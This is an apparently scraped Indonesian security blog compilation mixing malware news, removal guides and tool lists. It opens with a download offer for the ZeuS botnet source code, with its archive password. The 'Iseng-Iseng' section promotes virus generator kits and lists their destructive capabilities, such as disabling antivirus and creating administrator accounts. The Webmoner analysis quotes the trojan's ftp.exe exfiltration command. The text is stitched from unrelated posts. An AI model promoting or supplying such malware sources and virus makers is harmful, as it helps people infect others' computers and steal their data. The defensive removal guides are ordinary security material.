Source Code of ZeuS Botnet Version: 2.0.8.9

 Source Code of ZeuS Botnet Version: 2.0.8.9 from thehackernews.com

Download Now | RAR Password : zeus

Information on the Code Red Virus

The Code Red worm was first discovered and researched by eEye Digital Security employees, Marc Maiffret and Ryan Permeh. The worm was named the .ida "Code Red" worm because Code Red Mountain Dew was what they were drinking at the time, and because of the phrase "Hacked by Chinese!" with which the worm defaced websites.

Although the worm had been released on July 13, the largest group of infected computers was seen on July 19, 2001. On this day, the number of infected hosts reached 359,000.

Code Red has defacing many Web sites with the message "Hacked By Chinese," experts said. Despite the message, the origin of the virus is unknown.

The ultimate goal of the virus, known as a "worm," is to gather strength by infecting more computers and then have them all attack a numerical Internet address that represents the White House Web site. The assault, which was set to go off Thursday at 8 p.m. EDT, is a denial of service attack, designed to hamper or shut down a computer system by flooding it with huge amounts of data.

Gejala dan Efek Trojan Webmoner

Hoi.. hoi.. hoii.. \(^o^)/

Jumpa lagi dengan RajaKadal Dudul :P

Ehehehe.. setelah pada posting sebelumnya saya membahas tentang korupsi,

sekarang kita akan coba membahas tentang sesuatu yang sama dudulnya ama korupsi..

yakni sama-sama merusak sistem  >.<

Tanpa banyak basa basi lagi, kali ini kita akan mencoba membahas tentang Trojan Webmoner dengan nama lengkap W32/Webmoner.BNH (PWS.Kan.12) yang ciri penyerangan khususnya melakukan injeksi pada Rundll32.exe.

Nah, yang menjadikan trojan ini termasuk dalam kategori berbahaya adalah kemampuannya untuk mencuri data aktif seperti akun dan password. Sekalipun penyerangan trojan ini belom sekejam Sality Family, tapi menurut laporan, terdapat ratusan kompi yang terkena serangan trojan ini.

Anda tentunya tidak ingin menjadi korban selanjutnya bukan?

Dalam buku stategi perang berjudul "The Art of War" yang pernah ditulis oleh Sun Tzu, ada kutipan yang menyatakan bahwa untuk dapat mengalahkan musuh, kita harus mengenali musuh tersebut. Logika sederhananya, dengan mengenali, kita dapat melakukan proses scanning tentang titik-titik kelemahan yang mereka miliki. Dengan begitu kita bisa mengalahkan musuh dengan cara yang lebih efektif.

Filosofi tersebut tidak jauh berbeda ketika kita menghadapi virus atau trojan yang datang tanpa diundang ke komputer kita.. dan secara diam" melakukan aktifitas ilegal yang bisa merugikan kita tentunya.

Stop Here !! lanjut ke pokok persoalan..

Keluarga Webmoner : Pencuri Data Pribadi

Keluarga Webmoner merupakan salah satu kelompok trojan yang dirancang untuk mencuri informasi/ data dari pengguna komputer terutama hal-hal yang berhubungan dengan data pribadi keuangan.

W32/Webmoner ditemukan sejak tahun 2004, dan hingga kini sudah ratusan varian W32/Webmoner yang beredar. Salah satu varian terbaru dari W32/Webmoner yang terdeteksi yaitu W32/Webmoner.BNH.

Cara Mereka Masuk :

Memanfaatkan celah keamanan pada Windows yaitu Windows Shell Icon Handler / LNK (MS10-046)

Gejala & Efek Virus

# Aktif menggunakan file Windows (rundll32)
Agar tidak mudah diketahui oleh pengguna komputer, trojan W32/Webmoner.BNH berusaha menyamarkan identitas saat aktif dengan memanfaatkan file system Windows yaitu RUNDLL32.exe. Dengan file tersebut, trojan W32/Webmoner.BNH dapat dengan mudah melakukan infeksi, membaca aktivitas pengguna serta melakukan koneksi pada Remote Server

# Membuat komputer menjadi hang (explorer hang)
Saat komputer dinyalakan pertama kali dan login, Windows Explorer akan terasa lambat (hang) akibat aktifitas dari trojan yang menjalankan beberapa file RUNDLL32.EXE. Dengan begitu, pengguna komputer akan merasa terganggu dan tidak nyaman menggunakan komputer.


# Melakukan koneksi ke Remote Server
Trojan W32/Webmoner.BNH berusaha melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Koneksi ke remote server dilakukan dengan menggunakan berbagai macam port acak seperti :

    127.0.0.1 : 45316, 2820, 5339, 47347, 28787, 30738, dll
    xx.195.47.170 : 57381

# Mengupdate dirinya seperti antivirus
Agar mempermudah aksi-nya, trojan W32/Webmoner.BNH juga melakukan download beberapa file tertentu dari Remote Server serta agar tetap terupdate dan tidak mudah dikenali oleh antivirus.

# Melakukan transfer data/dokumen yang telah didapatkan ke Remote Server
Tujuan utama dari trojan W32/Webmoner.BNH adalah mendapatkan informasi dari pengguna komputer yang sudah terinfeksi. Untuk melakukan hal tersebut, trojan W32/Webmoner.BNH menggunakan perintah command sebagai berikut :

C:\WINDOWS\system32\ftp.exe ftp-s : C:\WINDOWS\system32\ftp.sys-A

Selain itu, dengan memanfaatkan celah keamanan MS10-046 (Windows Icon handler) maka file shortcut/LNK menjadi memiliki kemampuan worm dan akan dapat aktif secara otomatis saat kita mengakses drive tersebut tanpa menjalankan file tersebut sekalipun.

• Jaringan 
  Dengan memanfaatkan akses full sharing, trojan W32/Webmoner.BNH dapat mudah masuk dengan melakukan kopi beberapa file yang sama seperti penyebaran pada removable drive/disk.

Kira-kira seperti itulah ciri dan metode penyerangan pada sistem komputer kita.
Untuk mengatasi trojan jenis ini, saya sarankan anda menjalankan langkah-langkah yang telah terdapat di sini

Sumber : 

Google.com

http://vaksin.com/2011/0511/webmoner/webmoner.html

Pertimbangan Memilih Antivirus yang Tepat

Sudah dua bulan lamanya saya melakukan riset kecil-kecilan untuk memasang antivirus yang cocok di si kokom (nama komputer kesayangan saya). Mulai dari Antivirus luar seperti ABG eh.. AVG antivirus + Internet Security; Vipre Premium; Webrot Antivirus; Eset NOD32; Tren Micro Premium; Bit Defender + Internet Security 2011; Avast 6 Antivirus with Internet Security, Microsoft Security Essential + Windows Defender sampai yang terakhir saya mencoba menggunakan Dr.Web Antivirus V.4 yang telah memiliki lisensi.  Ndak ketinggalan pula mencicipi Antivirus lokal seperti PCMAV 5.1 dan Smadav 8.5 yang katanya cukup ampuh mengatasi virus-virus lokal :)

Sayangnya sampai saat ini saya belum menemukan AV yang handal plus nyaman saat dipakai. Kalo masalah kehandalan, saya percaya bahwa antivirus pada umumnya mampu meminimalisir masuknya malware" yang dikhawatirkan dapat merusak system di komputer. Tapi bagai buah simalakama, jaminan keamanan harus dibayar dengan pembengkakan kinerja RAM. Untuk komputer jaman sekarang yang udah canggih-canggih mah mungkin hal tersebut ndak jadi masalah, tapi buat si kokom,, hal tersebut menjadi pertimbangan :)

Kokom dari awal memang saya setting untuk memberikan kenyamanan ketika saya menggunakannya sehari-hari. Maka saya pikir, pemilihan antivirus yang tepat menjadi pertimbangan.

Setelah melakukan perundingan alot ama si kokom, akhirnya kami bersepakat untuk sementara waktu kokom ndak pake kondom.. eh.. antivirus kamsutnya :P 

Sebagai penggantinya, Kokom kembali saya pasangi Deepfreeze 7. Kemudian settingan 'save as' default dari Office sampai ke penyimpanan link download dari IDM, saya pindahkan ke drive yang tidak terlalu banyak mengandung file" penting. 

Selain itu tak lupa saya matikan semua 'automatic update' dan 'task scheduler' yang terdapat pada OS windows, juga pada browser. 

Nah.. yang tidak kalah pentingnya, tentu saja saya menyiapkan 'removal tool' untuk sesekali mengecek keberadaan penyusup di si Kokom. Biasanya saya mendownload Norman Malware Cleaner tiap Bulannya.

Tak lupa menyiapkan aplikasi" pendukung security lainnya seperti Port Monster, UnHackMe dan beberapa aplikasi security lainnya. Dengan begitu, saya tetap bisa menggunakan si Kokom dengan nyaman tanpa mengabaikan faktor security pada sebuah personal komputer.  :)

Bagaimana dengan Anda?

AnVir TaskManager Portable

Task Manager Di blok ma Virus? AnVir TM Portable Solusinya

Kadang menyebalkan bukan jika fitur Task Manager di kompi kita di blok/ di disabled ma virus..???

Ndak usah khawatir.. AntiVir TaskManager Versi Portable bisa menjadi alternatif solusi bagi agan2

Aplikasi ini tentu saja memiliki banyak kelebihan dibandingkan dengan task manager bawaan dari windows..

Seperti kemampuan untuk mengendalikan segala sesuatu yang berjalan di komputer, menghapus proses Trojan, mempercepat komputer, tweak proses Monitor Windows , Services, program-program startup, menggantikan tugas Task Manager dari spyware dan virus yang mematikan antivirus, Meningkatkan dan melakukan tune up, Mengatur Windows startup pada XP, Vista atau Windows 7, Mampu melakukan hal yang tidak dapat dilakukan pada Task Manager bawaan Windows, Mengetahui secara detail proses services, dan lain lain


Screenshotnya :








Beberapa Fitur AnVir Task Manager:

* Deskripsi sebanyak + 70 000 + startup program, services dan Extensi Internet Explorer

* proses analisis security, program startup dan layanan dasar Windows

* Startup Monitor: alert jika ada proses start up baru, blok program startup yang tidak dikehendaki

* Analisa file pada VirusTotal.com dengan 30 + antivirus engine

* Startup manager: mengelola semua program yang berjalan pada startup termasuk service dan Internet Explorer toolbar

* Dapat menyimpan log HijackThis dengan tambahan info

* Antivirus scanner. Tool anti-rootkit

* Dilengkapi informasi database virus

* Blok proses yang tidak dikehendaki secara permanen

* Mencatat lalu lintas TCP / UDP dari proses ke file (sniffer)

* Monitor proses, layanan, koneksi internet, CPU, disk, memori, DLL, driver, file terkunci, Windows.

* Menampilkan grafik dari prosesor, memori dan disk aktivitas untuk setiap proses dan komputer

* Dll

Link Lokal : AnVIr TM 5.4.1 Portable FULL

Tutor nya bisa langsung di cek di mari : http://www.anvir.com/tutorial

my official thread at : here

Mengatasi Virus Shortcut

 

 -Virus Shortcut-

Beberapa hari lalu, Kompi di kantor -secara ndak sengaja- terinfeksi virus shortcut aka Virus PIF/Starter. Virus ntu masuk tanpa bilang-bilang :P (padahal fungsi autorun di semua drive udah didisable) -dan langsung mengclone shortcut2 ndak penting :))

Sekalipun virus ini tergolong jenis virus yang berada di level medium risk, tapi efek psikologis yang ditimbulkan si virus ini ( yang terus membuat shortcut-shortcut baru sekalipun udah dihapus berkali-kali ) membuat si empunya kompi merasa kalo virus ini tergolong berbahaya (menyebalkan lebih tepatnya) :P

Menurut kabar yang beredar, virus ini bisa diatasi dengan antivirus lokal seperti Morphost AntiVirus dan Smavad. Saya sendiri telah mencoba men-scan virus tersebut memakai Smadav, dan CMC AntiVirus, tapi ndak ada perbaikan yang signifikan. Shortcut2 baru masih tetep bermunculan. :D

Alhasil, saya pun mencoba mengatasi virus tersebut secara manual :P (asyiknya berburu virus)

Hmm.. sebelum saya menuturkan cara2 mengatasi virus tersebut,, alangkah baiknya kita mengenali ciri-ciri dan bentuk serangan virus shortcut di kompi.. (kenali musuh agar kita lebih mudah mengalahkannya)

Ciri-Ciri si Virus Shortcut :

1. Membuat file induk database.mdb di My Documents
2. Membuat file autorun.inf di setiap Drive, Flash disk, dan folder
3. Membuat file Thumb.db (hati2 tanpa huruf s) di setiap folder
4. Membuat file Microsoft.lnk dan bla.. bla.. bla.. .ink
5. Membuat duplikat setiap folder dengan extensi .lnk
6. Pada task manager terdapat services wscript.exe

Nah.. kalo dah kenalan n cipika-cipiki ma virus shortcut, mari kita lanjut ke langkah2 mengatasi virus tersebut :P

Langkah – Langkah :

1. Matikan System Restore.

2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)
    Bisa menggunakan Process Explorer atau misc. tool pada HijackThis.

 

3. Hapus file virus database.mdb di My Documents.

 

4. Hapus file duplikat virus.

 Gunakan fasilitas search pada Windows.. Pada “More advanced options”, pastikan option “Search system folders” dan “Search hidden files and folders” dah dicentang :P

Search file dengan nama autorun.inf ukurannya 8 KB
Search file dengan nama Thumb.db ukurannya 8 KB
Search file dengan ekstensi .lnk ukurannya 1 KB

 
Hapus semua file yang ditemukan.

Alternatif lain bisa pake aplikasi sederhana ini :  UTools. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan.

5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis.

 
Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb 

 Selesai. (dah gitu doank) :D

NB : Untuk mencegah penyebaran virus melalu removable media (flashdisk or cd) di sarankan untuk mendownload software USB DISK SECURITY -link donlotnya ubek2 aja sendiri di blog ini- see ya..

'Naik Kelas', Virus Lokal Manfaatkan Celah di Windows

Kebanyakan virus lokal di Indonesia melakukan serangan dengan memanfaatkan keteledoran pengguna semata. Namun virus yang satu ini telah 'naik kelas' dengan memanfaatkan celah keamanan Windows.

Keberadaan virus itu disampaikan oleh peneliti antivirus dari Vaksincom, Alfons Tanujaya. "Dia membuat shortcut dan mengeksploitasi celah keamanan. Jarang virus lokal eksploitasi celah keamanan," tutur Alfons kepada detikINET, Kamis (26/8/2010).

Adang Jauhar Taufik, analis antivirus Vaksincom, mengatakan laporan pertama virus ini berasal dari kota Gorontalo di Sulawesi. Penyebaran virus ini diketahui melalui USB Flashdisk.

Virus ini mengubah folder yang ada di dalam USB Flashdisk menjadi shortcut. Kemudian, jika shortcut itu diakses virus akan menginfeksi komputer hingga kinerja komputer menjadi buruk.

Selain itu, Alfons mengatakan, virus ini melindungi dirinya dari piranti seperti Security Task Manager atau aplikasi pembunuh proses lainnya. Jika digunakan, aplikasi tersebut bisa hang atau mati.

"Kelihatannya, pembuat virusnya memperhatikan artikel-artikel pembasmian virus Vaksincom yang sering menggunakan Security Task Manager. Sehingga kalau dibersihkan, dia sudah prepare," kata Alfons.

Celah yang dimanfaatkan oleh virus ini adalah Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046. Microsoft telah menyediakan patch untuk menambal celah ini.

Norman Security Suite mendeteksi virus ini sebagai W32/VBWorm.BEUA. Untuk file shortcut-nya dikenali sebagai Trojan: LNK/CplLnk.A dan file .DLL dideteksi sebagai W32/Suspicious_Gen2.BTDDL.

Dr.Web Anti-virus mendeteksi virus ini sebagai  W32/HLLW.Autoruner.25850. File shortcut-nya dikenali sebagai Exploit.Cpllnk dan file .DLL dideteksi sebagai Win32.HLLW.VBNA.3.

Adang mengatakan, virus ini dibuat dengan mengunakan program bahasa Visual Basic. Virus dengan ukuran 128 KB itu menurutnya akan memiliki ekstensi EXE atau SCR, serta icon Microsoft Visual Basic Project.

sumber : detikInet

Winsta 'Menggelembung' Bikin Hardisk Penuh

Hati-hati dengan virus yang satu ini. Program jahat bernama Winsta ini bisa 'menggelembung' sehingga hardisk korbannya bisa seketika penuh olehnya.

Seperti dituturkan oleh analis antivirus dari Vaksincom, Adi Saputra, dalam keterangannya, Jumat (30/7/2010), Winsta dikenal juga dengan nama Stuxnet. Selain hardisk penuh, file Winsta juga bersembunyi sebagai file DLL sah dari Realtek, sehingga agak sulit mendeteksinya.

Penyebaran awal virus ini, menurut Adi, adalah melalui situs-situs berbahaya. Termasuk di antaranya adalah situs dengan konten porno, software ilegal dan situs-situs 'kelabu' lainnya.

Menurut analis Vaksincom Alfons Tanujaya, kepada detikINET, Jumat (30/7/2010), penyebaran Winsta di Indonesia cukup besar. Bahkan Indonesia menempati posisi kedua infeksi Winsta alias Stuxnet ini setelah Iran.

File Virus

Lebih lanjut, Adi mengatakan, jika script Trojan Stuxnet dari situs berbahaya tadi sudah berjalan akan muncul tiga file di komputer korban. Ketiganya adalah Winsta.exe, mrxcls.sys dan mrxnet.sys.

File bernama Winsta itu yang akan membengkak ukurannya sesuai sisa ruang hardisk yang ada. Biasanya partisi yang jadi korban adalah partisi tempat sistem operasi Windows berada.

Nama file itu, Winsta, dicatut dari nama file asli Windows untuk program bernama WinStation Monitor. Aplikasi ini merupakan tools yang digunakan pada Windows 2000 dan terletak di C:\Program Files\Resources\Winsta.exe.

Gejala & Efek Virus

Efek paling kasat mata dari virus ini tentunya adalah hardisk yang mendadak penuh. Akibat dari hardisk yang penuh itu, beberapa program mungkin tak akan berjalan dengan baik.

Selain itu,infeksi Stuxnet juga terjadi pada file sistem berikut:

• Scvhost, sehingga komputer sulit terhubung ke jaringan.
• Lsass, komputer bisa menjadi lambat, hang ataupun restart dengan sendirinya.
• Spoolsv, komputer tidak bisa mencetak dokumen/gambar lewat printer. 

Sumber : detikInet

Virus Stuxnet Bakal Naik Daun

Juni lalu Indonesia dihebohkan sosok Sinta-Jojo, artis dadakan baru yang namanya langsung mencuat. Seiring dengan itu, muncul virus baru bernama Stuxnet yang pamornya mulai mendekati Conficker.

"Kalau Sinta-Jojo awalnya hanya merekam gambar sebagai hiburan pribadi yang dipublish. Stuxnet hadir secara sistematis memanfaatkan celah keamanan pada Microsoft yang selama ini ada dan tanpa disadari menggandeng LNK exploit dalam menyebarkan diri," ujar Yudhi Kukuh, Security Consultant ESET Indonesia, sesuai keterangan tertulis yang diterima detikINET, Kamis (12/8/2010).

Juni 2010 Stuxnet memang belum dikenal. Bahkan belum ada laporan masuk mengenai virus ini. Tepat satu bulan kemudian pada tanggal 15 Juli, ESET melalui ThreatSense Technology nya mengenali malware baru dengan nama LNK/Autostart.A trojan.

Kemudian dengan kemampuan heuristiknya, ESET mulai mengenali varian ini dengan nama LNK/Exploit.CVE-2010-2568. Setelah itu muncul W32/Stuxnet yang menargetkan pada sistem Industrial Control System (SCADA).


Apa Efeknya Pada PC Yang Terjangkit?

Menurut Yudhi, Stuxnet diprediksi akan terkenal karena kelalaian pengguna OS Microsoft Windows, untuk melakukan patch 2286198 karena berbagai hal. Paling sering adalah Automatic Update yang tidak dinyalakan. Biasanya ini terjadi pada OS Windows bajakan.

Komputer yang terjangkit biasanya hardisknya akan penuh tanpa sebab. Pasalnya, virus ini menyaru sebagai program resmi yang memiliki sertifikat keamanan curian, dari vendor terkenal.

Kehadirannya Stuxnet di Indonesia langsung menyodok ke urutan delapan dan sepuluh malware paling berbahaya pada Juli 2010. Berikut data sebaran 10 jenis malware dari ThreatSense ESET.

1. Win32/Conficker.AA
2. Win32/VB
3. Win32/Conficker.X
4. Win32/Agent
5. Win32/Conficker.Gen
6. Win32/Alman.NAB
7. Win32/VB.ROA
8. Win32/Stuxnet.A
9. Win32/Disabler.NAK
10. LNK/Autostart.A

Pada bulan Agustus 2010 Stuxnet dan variannya berhasil mengambil posisi Conficker dan varian dari VB/Autorun malware yang sudah berbulan-bulan selalu bercokol di 10 besar. Alhasil urutan tiga, lima dan sepuluh langsung diraihnya dalam waktu singkat.

1. Win32/Conficker.AA
2. Win32/Conficker.X
3. LNK/Autostart.A
4. Win32/Agent
5. Win32/Stuxnet.A
6. Win32/VB
7. Win32/Conficker.Gen
8. Win32/Alman.NAB
9. Win32/Sality.NAO
10. LNK/Exploit.CVE-2010-2568

sumber : detikInet

Serangan Program Jahat Meningkat

Jakarta - Produksi kode software yang disebut sebagai malware atau program jahat yang bisa merusak komputer dan mencuri password pengguna mencapai puncak tertingginya
dalam enam bulan pertama di 2010.

Hal tersebut diungkapkan oleh firma keamanan komputer dan internet McAfee. Data yang dirilis McAfee memperlihatkan, produksi total jumlah malware terus bertambah dan sekitar sepuluh juta kode malware baru disusun dalam katalog.

"Laporan terbaru kami memperlihatkan bahwa malware tengah mencapai pertumbuhan tertingginya dalam setengah tahun pertama 2010," kata Chief Technology Officer of Global Threat Intelligence McAfee, Mike Gallagher.

Dikutip detikINET dari Reuters, Rabu (11/9/2010), McAfee juga memperingatkan para pengguna komputer Mac. Padahal umumnya, pengguna komputer Mac dianggap aman dari serangan virus. Namun dalam laporannya McAfee menyebutkan bahwa pengguna komputer Mac pun berpotensi terkena serangan malware.

April silam, McAfee Labs mendeteksi adanya virus Trojan berbasis Mac yang dikenal dengan nama OSX/HellRTS. Virus ini membaca atau memodifikasi konten
clipboard atau memainkan trik pada user seperti membuka dan menutup drive CD.

"Kami tidak ingin membesar-besarkan serangan ini. Namun sebagai peringatan bahwa di era cybercrime seperti sekarang, pencurian data dan identitas pengguna semua sistem operasi dan perangkat patut dicegah," demikian bunyi laporan McAfee.

sumber : detikInet

50 Malware Berbahaya Bulan Agustus 2010

Jakarta - Kaspersky Lab mengupdate data 50 malware paling berbahaya di Indonesia. Data tersebut diambil berdasar laporan Kaspersky Lab untuk periode 5 - 12 Agustus 2010.

Data berikut merupakan konten yang dikumpulkan dari server Kaspersky, berdasarkan jumlah serangan yang dikirimkan ke jaringan keamanan Kaspersky.

Adapun jumlah server jaringan keamanan Kaspersky saat ini berjumlah lebih dari 7.000. Untuk menyeleksinya menjadi top 50, malware-malware tersebut diukur tingkat bahayanya dengan jumlah serangan pada ribuan server Kaspersky di seluruh dunia.

Berdasar keterangan tertulis Kaspersky yang diterima detikINET, Jumat (13/8/2010), berikut adalah data urutan malware-malware berbahaya di Indonesia pada awal bulan ini:


----------------------------------------------------
Nama Malware                                          Hits

----------------------------------------------------

Packed.Win32.Katusha.o                       33.6842%

HEUR:Trojan.Win32.Generic                    18.9474%

Trojan-Banker.Win32.Banker.ubf               4.2105%

Backdoor.Win32.Agent.awhk                    3.1579%

Trojan-Dropper.Win32.Delf.ejv                2.1053%

Net-Worm.Win32.Kido.ih                       2.1053%

Trojan.Win32.Refroso.bojv                    2.1053%

Exploit.Win32.DCom.ad                        2.1053%

not-a-virus:AdWare.Win32.Relevant.p          2.1053%

not-a-virus:AdWare.Win32.Relevant.q          2.1053%

Trojan-Dropper.Win32.Clons.hpx               2.1053%

Trojan-Spy.Win32.Ardamaxer.a                 2.1053%

Trojan-Dropper.MSIL.Agent.ate                1.0526%

Packed.Win32.Black.d                         1.0526%

HackTool.Win32.Flooder.z                     1.0526%

HEUR:Trojan-Downloader.Win32.Generic         1.0526%

Trojan-Downloader.Win32.Agent.edla           1.0526%

Trojan.NSIS.StartPage.bb                     1.0526%

Trojan-PSW.Win32.Dybalom.bkn                 1.0526%

Backdoor.Win32.Aimbot.cg                     1.0526%

Trojan.Win32.Agent.defn                      1.0526%

Trojan.Win32.Buzus.fbur                      1.0526%

Backdoor.MSIL.Agent.ju                       1.0526%

Trojan.Win32.Agent.efdi                      1.0526%

Trojan-GameThief.Win32.OnLineGames.wzfj      1.0526%

not-a-virus:AdWare.Win32.Rabio.xt            1.0526%

HackTool.Win32.Kiser.mc                      1.0526%

Trojan-Dropper.Win32.Delf.fny                1.0526%

Backdoor.Win32.Bifrose.ceow                  1.0526%

Trojan-Dropper.Win32.Delf.cjc                1.0526%

Trojan.Win32.Refroso.aavu                    1.0526%

Packed.Win32.Krap.ae                         1.0526%

Backdoor.Win32.Surila.ck                     1.0526%

Trojan-Spy.Win32.Zbot.alpq                   1.0526%

sumber : DetikInet

wew.. kudu siap antisipasi cuy... :P

6 Tool's Pamungkas Untuk Menghadapi Virus

Ketika virus yang bagus dan kuat menginfeksi komputer, kebanyakan dari virus tersebut akan mendisable berjalannya Task Manager (taskmgr.exe), Registry Editor (regedit.exe), Command Prompt (cmd.exe), System Configuration Utility (msconfig.exe), folder option dan menyembunyikan Run dari Start Menu. Alasannya adalah karena kemungkinan para user yang mahir komputer dapat me-remove virus dengan menggunakan program-program tsb.

Ketika kita tidak bisa menjalankan Task Manager, kita tidak bisa mematikan proses virus. Paling tidak kita bisa menggunakan perintah taskkill pada Command Prompt, tapi sekali lagi, kita tidak bisa melakukan itu jika CMD pun telah di disable, mungkin kita bisa menjalankan msconfig untuk menghentikan virus dari auto startup, tapi tetap tidak bisa jika virus mendisablenya. Bagi para user advance yang mempunyai basic registry dan dengan cara itu mereka bisa secara manual me-remove virus dari list auto start up, tapi tetap tidak akan bisa juga jika file registry (regedit.exe) didisable. Begitu pula folder option dan proses-proses lainnya yang didisable untuk memperpanjang kinerja virus itu sendiri.


Jadi untuk hal-hal yang bersifat darurat, ada tool-tool pengganti yang bisa digunakan ketika tools asli windows banyak yang di disable, dari 12 tool yang akan sedikit dibahas disini hanyalah 6, yaitu :


1. Process Explorer sebagai pengganti Task Manager (taskmgr.exe)

Task Manager sangatlah penting karena dari situ kita bisa melihat hampir seluruh proses

Yang sedang berjalan di windows, begitu juga jumlah memory yang terpakai dan CPU yang terpakai. Jika kita menemukan sesuatu yang mencurigakan disitu, kita bisa akhiri prosesnya (terminating). Jika kita tidak bisa menggunakan Task Manager dan mendapatkan pesan “Task Manager has been disabled by your administrator”, kita bisa menggunakan Process Explorer. Tool ini portable kita bisa menyimpannya di usb drive.


2. RegAlyzer sebagai pengganti Registry Editor (regedit.exe)

Tanpa kemampuan untuk mengakses registry Windows, kita tidak bisa secar manual membuat perubahan sama sekali, tidak bisa mengimpor file registry (REG files). Ketika virus telah mendisable regedit kita dapat menemukan sebuah pesan "Registry editing has been disabled by your administrator”, ketika kita menjalankannya. Alternatif yang bagus adalah dengan menggunakan RegAlyzer, dikembangkan oleh Spybot. RegAlyzer membutuhkan isntalasi, tapi kita bisa copy semua folder yang talh jadi ke usb drive dan menjalakannya secara portable.


3. GS sebagai pengganti Command Prompt (cmd.exe)

Command prompt adalah tool yang powerful yang mendukung banyak perintah (commands) ketika kita menemukan sesuatu yang tidak bisa dilakukan di windows. Jika kita menjalankan command prompt dan mendapatkan pesan “The command prompt has been disabled by your administrator. Press any key to continue”, kita dapat menggunakan GS. GS adalah pengganti cmd, GS freeware dan portable.


4. Run Dialog Replacement 1.0 sebagai pengganti Kotak Dialog Run

Beberapa virus juga menghilangkan perintah run dari Start Menu dan tidaklah mudah untuk memunculkannya. Walaupun hal ini tidak begitu penting. Tapi Run memudahkan kita untuk melakukan perintah yang penting. Run Dialog Replacement V.1.0 cukup kecil, hanya berukuran 48 kb dan juga portable. Gunakan perintah Run dengan hanya menekan ctrl+R.


5. Autoruns sebagai penganti System Configuration Utility (msconfig.exe)

Msconfig adalah tempat pertama kali kita melakukan pemeriksaan ketika komputer didiagnosa terinfeksi virus. Jika kita menjalankan msconfig dan klik tab startup, maka akan terlihat seluruh program yang akan berjalan ketika windows baru start. Para pembuat virus sangat awas mereka biasanya mendelete file original msconfig atu mengganti lokasi aslinya dari registry windows. Jika kita menemukan pesan “Windows cannot find ‘msconfig’. Make sure you typed the name correctly, and then try again. To search for a file, click the Start button, and then click Search.” ketika mengakses msconfig. Alternatif yang bagus untuk itu adalah tool Autoruns, satu publish dengan Process Explorer. Autoruns mempunyai banyak keterangan dari lokasi berjalannya suatu proses dari startup, menunjukkan program yang megnkonfigurasi ketika system booting dan login.


6. FreeCommander sebagai pengganti Folder Option

Saya telah banyak mencoba memanage file dan kebanyakan dari padanya merubah "show hidden files or hide protected opering system" dari setingannya pada windows. Jika virus tetap aktif di memory, maka masih bisa merubah setting untuk mendisable dari melihat file-file yang di sembunyikan (hidden) dan file system. FreeCommander adalah tool yang dapat melakukan aksi seperti folder option, tool ini portable. Kita dapat mengextract semua filenya ke usb drive.

Tool yang lain mempunyai fungsi yang hampir sama, diantaranya yaitu:

- autorun management application
- Proccess Master
- Sohand Removal tool
- Files And Folders Reset attrebiutes


pasti tanya.. lho.. kok ada link donlotnya???

wekeke.. emang sengaja belum gw share..
tapi seenggaknya, gw dah kasih alat pancingnya..

 Iseng-Iseng Part Kesekian :P

 

Wekekeke.. ternyata membuat virus tidak membutuhkan keahlian coding atau paling tidak menguasai salah satu bahasa pemrograman windows populer seperti VB atau C++. Dengan Virus Generator, pembuatan virus dapat dilakukan secepat membuat mie instan. Tinggal klik dan klik, maka sebuah virus dengan mudahnya tercipta.

Virus generator banyak tersebar di dengan beragam pilihan. Anda bisa mencarinya di forum-forum atau situs bawah tanah. Meskipun virus yang diciptakan dapat dibuah dengan mudah, namun anda tidak bisa meremehkan ketangguhanya. Beberapa virus terkenal di yang banyak menyebar di Indonesia atau di dunia banyak yang dibuat dengan virus generator ini.

Berikut beberapa virus generator yang cukup populer yang dapat anda coba untuk membuat virus dengan mudah:

1. In Shadow Batch Virus Generator


Kemampuan:
- Menginfeksi beragam ekstensi file populer
- Mengaktifkan virus ketika start up
- Mematikan berbagai proses dan service penting
- Mengganti ekstensi file dan menyebarkanya melalui file sharing
- Membuat account administrator baru, mengganti password administrator.
- Mematikan komputer otomatis, mendownload files otomatis, dll

Download In Shadow Batch Virus Generator

2. JPS Virus Maker


Kemampuan:
- Mematikan regedit, task manager, MS Config dan beragam aplikasi yang membahayakan kelangsungan hidup virus.
- Menonaktifkan anti virus, wordpad, notepad, command prompt, dll
- Menghiden drive, file, dan tombol-tombol penting seperti Shutdown, restart, logoff, dll
- Mematikan monitor, memainkan mouser, membuka CD drive, dll

Download JPS Virus Maker

3. TeraBIT Virus Maker


Kemampuan:
Memiliki beragam kemampuan seperti dua virus generator di atas.

Download TeraBIT Virus Maker

Virus-Virus HandPhone Terdudul >.<'

1.CABIR

Cabir merupakan merupakan virus Symbian pertama dan terpopuler hingga saat ini. Cabir termasuk jenis worm yang menyebar melalui koneksi Bluetooth dan masuk ke ponsel melalui inbox pesan Anda dengan nama-nama yang menarik perhatian. Jika Anda mengklik file.sis tersebut dan menginstalnya, Cabir akan mulai mencari mangsa baru ponsel dengan akses Bluetooth terbuka, untuk menginfeksinya.
Cabir dikenal juga dengan nama SymOS/Cabir.A, EPOC/Cabir.A, Worm.Symbian.Cabir.a, dan virus Caribe. Variannya kini telah berkembang hingga embel-embel abjad terakhir Cabir.Z. Cabir.Z sebenarnya merupakan varian dari Cabir B, hanya penyebarannya menggunakan nama velasco.sis.
Cabir akan mengaktifkan Bluetooth Anda secara periodic, sekitar 15-20 menit sekali untuk mencari mangsa. Tak ada kerusakan file yang berarti, hanya saja jika ponsel Anda terinfeksi, baterainya akan cepat habis karena digunakan untuk mencari perangkat Bluetooth lainnya.

Untuk mencegahnya, matikan (disable) fitur Bluetooth Anda. Aktifkan hanya saat akan digunakan. Dan yang perlu diingat adalah jangan menginstal aplikasi Symbian dengan nama caribe.sis atau nama-nama yang aneh. 

2.COMMWARRIOR

Commwarrior masuk dalam keluarga virus ponsel jenis worm. Virus ini menyebar melalui MMS, koneksi Bluetooth, dan pertukaran kartu memori dengan nama yang beracak (random) xxx.sis.
Tipe serangan Commwarrior bermacam-macam. Yang paling umum, Commwarrior menyebar lewat Bluetooth. Beberapa varian juga dapat mengirim MMS acak ke kontak yang terdapat di phonebook Anda.
Commwarrior tak hanya punya satu nama. Layaknya penjahat, dia juga memiliki nama samaran atau alias seperti Commwarrior [dikenal oleh anvir F-Secure], SymbOS/Commwarrior [McAfee], SYMBOS_COMWAR [Trend Micro].
